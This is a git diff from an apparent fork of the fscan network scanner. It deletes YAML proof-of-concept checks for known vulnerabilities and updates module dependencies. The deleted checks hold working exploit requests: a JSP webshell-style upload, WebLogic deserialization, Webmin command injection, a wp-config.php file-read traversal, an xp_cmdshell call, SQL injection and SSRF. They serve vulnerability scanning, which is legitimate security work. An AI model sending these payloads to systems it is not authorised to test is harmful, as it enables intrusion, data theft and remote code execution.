boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo - body: |- - ------WebKitFormBoundaryFy3iNVBftjP6IOwo - Content-Disposition: form-data; name="file"; filename="{{r1}}.jsp" - Content-Type: application/octet-stream - <%out.print({{r2}} * {{r3}});%> - ------WebKitFormBoundaryFy3iNVBftjP6IOwo-- - expression: response.status == 200 - - method: GET - path: '/page/exportImport/fileTransfer/{{r1}}.jsp' - expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/weblogic-cve-2020-14750.yml b/WebScan/pocs/weblogic-cve-2020-14750.yml deleted file mode 100644 index 8db8464..0000000 --- a/WebScan/pocs/weblogic-cve-2020-14750.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-weblogic-cve-2020-14750 -rules: - - method: GET - path: /console/images/%252E./console.portal - follow_redirects: false - expression: | - (response.status == 302 && response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console.portal?_nfpb=true"))) -detail: - author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless) - weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 - links: - - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html diff --git a/WebScan/pocs/weblogic-ssrf.yml b/WebScan/pocs/weblogic-ssrf.yml deleted file mode 100644 index 1c84c1c..0000000 --- a/WebScan/pocs/weblogic-ssrf.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-weblogic-ssrf -rules: - - method: GET - path: >- - /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 - headers: - Cookie: >- - publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; - follow_redirects: false - expression: >- - response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed")) diff --git a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml b/WebScan/pocs/weblogic-v10-cve-2017-10271.yml deleted file mode 100644 index 1468f14..0000000 --- a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-weblogic-cve-2017-10271 # nolint[:namematch] -rules: - - method: POST - path: /wls-wsat/CoordinatorPortType - headers: - Content-Type: text/xml - body: >- - 505053555551485749 - follow_redirects: true - expression: > - response.body.bcontains(b"225773091") -detail: - vulnpath: '/wls-wsat/CoordinatorPortType' - author: fnmsd(https://github.com/fnmsd) - description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271' - weblogic_version: '10' - links: - - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 - - https://github.com/QAX-A-Team/WeblogicEnvironment - - https://xz.aliyun.com/t/5299 \ No newline at end of file diff --git a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml b/WebScan/pocs/weblogic-v12-cve-2019-2725.yml deleted file mode 100644 index 176adae..0000000 --- a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-weblogic-cve-2019-2725 # nolint[:namematch] -rules: - - method: POST - path: /wls-wsat/CoordinatorPortType - headers: - Content-Type: text/xml - body: >- - fffhelloorg.slf4j.ext.EventDataconnectionHandlertrue505053555551485749]]> - follow_redirects: true - expression: > - response.body.bcontains(b"225773091") -detail: - vulnpath: '/wls-wsat/CoordinatorPortType' - author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166) - description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2019-2725 + org.slf4j.ext.EventData' - weblogic_version: '>12' - links: - - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 - - https://github.com/QAX-A-Team/WeblogicEnvironment - - https://xz.aliyun.com/t/5299 \ No newline at end of file diff --git a/WebScan/pocs/webmin-cve-2019-15107-rce.yml b/WebScan/pocs/webmin-cve-2019-15107-rce.yml deleted file mode 100644 index 9a7a1ce..0000000 --- a/WebScan/pocs/webmin-cve-2019-15107-rce.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: poc-yaml-webmin-cve-2019-15107-rce -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /password_change.cgi - headers: - Referer: "{{url}}" - body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2 - follow_redirects: false - expression: > - response.body.bcontains(bytes(string(r1 + r2))) -detail: - author: danta - description: Webmin 远程命令执行漏洞(CVE-2019-15107) - links: - - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 diff --git a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml deleted file mode 100644 index 5d75468..0000000 --- a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-wordpress-cve-2019-19985-infoleak -rules: - - method: GET - path: "/wp-admin/admin.php?page=download_report&report=users&status=all" - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) -detail: - author: bufsnake(https://github.com/bufsnake) - links: - - https://www.exploit-db.com/exploits/48698 diff --git a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml deleted file mode 100644 index a26f05d..0000000 --- a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-wordpress-ext-adaptive-images-lfi -rules: - - method: GET - path: >- - /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://www.anquanke.com/vul/id/1674598 - - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 diff --git a/WebScan/pocs/wordpress-ext-mailpress-rce.yml b/WebScan/pocs/wordpress-ext-mailpress-rce.yml deleted file mode 100644 index 523b0f2..0000000 --- a/WebScan/pocs/wordpress-ext-mailpress-rce.yml +++ /dev/null @@ -1,23 +0,0 @@ -name: poc-yaml-wordpress-ext-mailpress-rce -set: - r: randomInt(800000000, 1000000000) - r1: randomInt(800000000, 1000000000) -rules: - - method: POST - path: "/wp-content/plugins/mailpress/mp-includes/action.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=&html=&plaintext=&mail_format=standard&autosave=1 - expression: "true" - search: | - XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://www.hackbug.net/archives/111.html diff --git a/WebScan/pocs/yonyou-grp-u8-sqli.yml b/WebScan/pocs/yonyou-grp-u8-sqli.yml deleted file mode 100644 index 5fd8452..0000000 --- a/WebScan/pocs/yonyou-grp-u8-sqli.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-yonyou-grp-u8-sqli -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /Proxy - body: > - cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html \ No newline at end of file diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml deleted file mode 100644 index 8e6b75e..0000000 --- a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml +++ /dev/null @@ -1,26 +0,0 @@ -name: poc-yaml-yonyou-nc-arbitrary-file-upload -set: - r1: randomInt(10000, 20000) - r2: randomInt(1000000000, 2000000000) - r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t" - r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx" -rules: - - method: POST - path: /servlet/FileReceiveServlet - headers: - Content-Type: multipart/form-data; - body: >- - {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> - expression: | - response.status == 200 - - method: GET - path: '/{{r1}}.jsp' - headers: - Content-Type: application/x-www-form-urlencoded - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r2))) -detail: - author: pa55w0rd(www.pa55w0rd.online/) - Affected Version: "YONYOU NC > 6.5" - links: - - https://blog.csdn.net/weixin_44578334/article/details/110917053 \ No newline at end of file diff --git a/WebScan/pocs/zabbix-authentication-bypass.yml b/WebScan/pocs/zabbix-authentication-bypass.yml deleted file mode 100644 index 1cc08ab..0000000 --- a/WebScan/pocs/zabbix-authentication-bypass.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-zabbix-authentication-bypass -rules: - - method: GET - path: /zabbix.php?action=dashboard.view&dashboardid=1 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes("Share")) && response.body.bcontains(b"Dashboard") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://www.exploit-db.com/exploits/47467 \ No newline at end of file diff --git a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml b/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml deleted file mode 100644 index 494acc6..0000000 --- a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-zabbix-cve-2016-10134-sqli -set: - r: randomInt(2000000000, 2100000000) -rules: - - method: GET - path: >- - /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) -detail: - author: sharecast - links: - - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 \ No newline at end of file diff --git a/go.mod b/go.mod index b09342a..87b2ac7 100644 --- a/go.mod +++ b/go.mod @@ -1,19 +1,20 @@ -module github.com/shadow1ng/fscan +module github.com/timwhitez/fscan go 1.16 require ( github.com/denisenkom/go-mssqldb v0.10.0 github.com/go-sql-driver/mysql v1.6.0 - github.com/golang/protobuf v1.3.4 - github.com/google/cel-go v0.6.0 + github.com/golang/protobuf v1.5.2 + github.com/google/cel-go v0.7.3 github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 - github.com/lib/pq v1.10.1 + github.com/lib/pq v1.10.2 github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca + github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4 github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 - golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de - golang.org/x/net v0.0.0-20200301022130-244492dfa37a - golang.org/x/text v0.3.2 - google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 + golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97 + golang.org/x/net v0.0.0-20210716203947-853a461950ff + golang.org/x/text v0.3.6 + google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b ) diff --git a/go.sum b/go.sum index 341ad2e..09150ac 100644 --- a/go.sum +++ b/go.sum @@ -1,98 +1,187 @@ cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= +github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f h1:0cEys61Sr2hUBEXfNV8eyQP01oZuBgoMeHunebPirK8= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= +github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/denisenkom/go-mssqldb v0.10.0 h1:QykgLZBorFE95+gO3u9esLd0BmbvpWp0/waNNZfHBM8= github.com/denisenkom/go-mssqldb v0.10.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= +github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= -github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w= -github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc= +github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-sql-driver/mysql v1.6.0 h1:BCTh4TKNUYmOmMUcQ3IipzF5prigylS7XXjEkfCHuOE= github.com/go-sql-driver/mysql v1.6.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= -github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/golang/protobuf v1.3.4 h1:87PNWwrRvUSnqS4dlcBU/ftvOIBep4sYuBLlh6rX2wk= github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/google/cel-go v0.6.0 h1:Li+angxmgvzlwDsPuFc1/nbqnq3gc4K/X7NrWjOADFI= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= +github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= github.com/google/cel-go v0.6.0/go.mod h1:rHS68o5G1QcUv/ubiCoZ5nT5LHxRWWfS0qMzTgv42WQ= +github.com/google/cel-go v0.7.3 h1:8v9BSN0avuGwrHFKNCjfiQ/CE6+D6sW+BDyOVoEeP6o= +github.com/google/cel-go v0.7.3/go.mod h1:4EtyFAHT5xNr0Msu0MJjyGxPUgdr9DlcaPyzLt/kkt8= github.com/google/cel-spec v0.4.0/go.mod h1:2pBM5cU4UKjbPDXBgwWkiwBsVgnxknuEJ7C5TDWwORQ= +github.com/google/cel-spec v0.5.0/go.mod h1:Nwjgxy5CbjlPrtCWjeDjUyKMl8w41YBYGjsyDdqk0xA= github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= -github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/hirochachacha/go-smb2 v1.0.10 h1:fiSNyMOOlWzfdTVk6VtvxfDGqhjNDI2iYZjd/jdtmhk= -github.com/hirochachacha/go-smb2 v1.0.10/go.mod h1:8F1A4d5EZzrGu5R7PU163UcMRDJQl4FtcxjBfsY8TZE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= +github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 h1:P2S26PMwXl8+ZGuOG3C69LG4be5vHafUayZm9VPw3tU= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU= -github.com/lib/pq v1.10.1 h1:6VXZrLU0jHBYyAqrSPa+MgPfnSvTPuMgK+k0o5kVFWo= github.com/lib/pq v1.10.1/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= +github.com/lib/pq v1.10.2 h1:AqzbZs4ZoCBp+GtejcpCpcxM3zlSMx29dXbUSeVtJb8= +github.com/lib/pq v1.10.2/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca h1:NugYot0LIVPxTvN8n+Kvkn6TrbMyxQiuvKdEwFdR9vI= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca/go.mod h1:uugorj2VCxiV1x+LzaIdVa9b4S4qGAcH6cbhh4qVxOU= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4 h1:OWSmL0LYmfDX2oXDt3RErvCAQpyZNUm7AFgZJ5q43sA= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4/go.mod h1:dG+K6/t5Skg+75lDytmXIBzl7XU4rMvBaMYOeIifBTI= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIYcDDBdpUObzKwVW9okNWcLYL/nnU= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww= +github.com/stoewer/go-strcase v1.2.0 h1:Z2iHWqGXH00XYgqDmNgQbIBxf3wrNq0F3feEy0ainaU= +github.com/stoewer/go-strcase v1.2.0/go.mod h1:IBiWB2sKIp3wVVQ3Y035++gc+knqhUQag1KpM8ahLw8= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA= github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0= github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +go.opentelemetry.io/proto/otlp v0.7.0/go.mod h1:PqfVotwruBrMGOCsRd/89rSnXhoiJIqeYNgFYFoEGnI= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= -golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de h1:ikNHVSjEfnvz6sxdSPCaPt572qowuyMDMJLLm3Db3ig= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97 h1:/UOmuWzQfxxo9UtlXMwuQU8CMgg1eZXqTRwkSQJWKOI= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20210508222113-6edffad5e616/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net v0.0.0-20200301022130-244492dfa37a h1:GuSPYbZzB5/dcLNCwLQLsg3obCJtX9IJhpXkvY7kzk0= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod 